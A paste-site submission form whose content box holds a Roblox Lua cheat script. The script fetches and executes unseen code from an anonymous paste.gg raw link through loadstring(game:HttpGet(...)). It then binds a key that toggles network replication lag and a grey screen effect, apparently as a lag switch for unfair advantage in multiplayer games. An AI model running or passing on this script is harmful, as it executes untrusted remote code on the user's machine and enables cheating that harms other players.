ControlC
· Pastebin
Login
Register
ControlC
/
Create paste
Paste content
Up to 100 KB of text. BBCode formatting is supported.
Title
- optional
Content
B
I
U
S
</>
Colors ↓
Sizes ↓
Size 1
Size 2
Size 3
Size 4
Size 5
Size 6
Size 7
--RIGHT control, not left\r\n_G.key = Enum.KeyCode.LeftControl\r\n \r\nloadstring(game:HttpGet(\"https://paste.gg/p/anonymous/cb1c7198b269449eb8a2cf8ced061bed/files/4a98e88f82ee47388b3030a7f000b34e/raw\", true))()\r\n \r\nsetting = settings().Network\r\nlocal Effect = Instance.new(\"ColorCorrectionEffect\")\r\nEffect.Parent = game.Lighting\r\nEffect.Saturation = -1 \r\nEffect.Contrast = 0\r\ntoggle = false\r\n \r\nEffect.Enabled = false\r\nfunction onKeyPress(inputObject, gameProcessedEvent)\r\n if inputObject.KeyCode == Enum.KeyCode.RightControl then \r\n if toggle == false then\r\n setting.IncomingReplicationLag = 1000\r\n Effect.Enabled = true\r\n toggle = true\r\n else\r\n setting.IncomingReplicationLag = 0\r\n Effect.Enabled = false\r\n toggle = false\r\n end\r\n \r\n end\r\nend\r\n \r\ngame:GetService(\"UserInputService\").InputBegan:connect(onKeyPress)\r\ngame:GetService(\"UserInputService\").InputBegan:connect(onKeyPress)
Password
Anyone with the link will still need this password to view.
Self Destruct
5 minutes
1 hour
3 hours
6 hours
12 hours
24 hours
48 hours
72 hours
Sign in to enable "Never expires".
Create paste
Please verify you are human
Cancel